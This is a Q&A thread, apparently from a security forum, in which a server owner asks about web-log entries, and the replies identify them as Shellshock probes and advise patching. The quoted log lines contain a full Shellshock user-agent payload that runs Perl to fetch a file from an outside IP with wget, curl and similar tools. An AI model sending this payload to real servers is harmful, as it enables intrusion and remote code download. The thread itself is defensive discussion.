3

I have a few worrying entries in my web server logs and I'm wondering if this means that my server is vulnerable.

Firstly, the following seems to fail, receiving a 404 response:

[15/Jan/2016:10:27:47 +0000] "GET /cgi-bin/php4 HTTP/1.1" 404 345 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plainrnrnXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png ");'"
[15/Jan/2016:10:27:48 +0000] "GET /cgi-bin/php5 HTTP/1.1" 404 345 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plainrnrnXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png ");'"

But what concerns me is the next message, which appears to receive a 200 response:

[15/Jan/2016:10:27:48 +0000] "GET / HTTP/1.1" 200 2091 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plainrnrnXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png ");'"

My server responded by blocking the IP address but clearly it was a little too late.

The logs suggest that all that was managed was to download an image file (which apparently doesn't exist on the server). But this looks like it was only a probe and could be much worse next time. Or am I assuming too much?

I can add additional filters but what can I do to protect myself from a similar kind of attack? How would I even know if I'd already been compromised?

The IP address is located in Iran. I've already blocked China so may consider doing the same to Iran. Extreme, yes, but the logs show that thousands of attempts from China are dropped every day.

Ken Sharp
  • 126
  • 9
  • 2
    These are just different user agents probing your server and sometimes looking if an exploit will work. The access log shows only what gets tried and not if you are vulnerable. 200 response might indicate a problem but does not need, it depends on your web site setup, server configuration... – Steffen Ullrich Jan 15 '16 at 13:13
  • The 200 response certainly does raise eyebrows, even monobrows. – Ken Sharp Jan 15 '16 at 15:15
  • 1
    To format as code, you'd need to put 4 spaces before hand. But, that would disable word wrap, which isn't a good idea, so I think leaving as-is would be good. – Pokechu22 Jan 15 '16 at 19:58
  • @Pokechu22 That's the one, thanks! I think I tried three spaces. Post edited. – Ken Sharp Jan 16 '16 at 20:34

1 Answers1

8

Notice the magic string () { :; };. They are trying to poke around and see if your server is vulnerable to the ShellShock exploit. Perl is used here to print and see if the attack succeeded. Make sure to patch and update your server. You should be safe from these kind of attacks.

HamZa
  • 1,370
  • 1
  • 15
  • 19
  • 1
    I knew I'd seen that somewhere before! Thankfully I'm already patched up to stop that. Phew! Thanks. – Ken Sharp Jan 15 '16 at 15:14
  • 2
    The link provided is a good read. It may be worth repeating the top comment from this link that notes that the colon in `(){ :; };` can actually be anything. So you can't rely on recognizing this exact string, it could be `(){ 123; xyz; };` or anything else. – u8it Jan 15 '16 at 19:58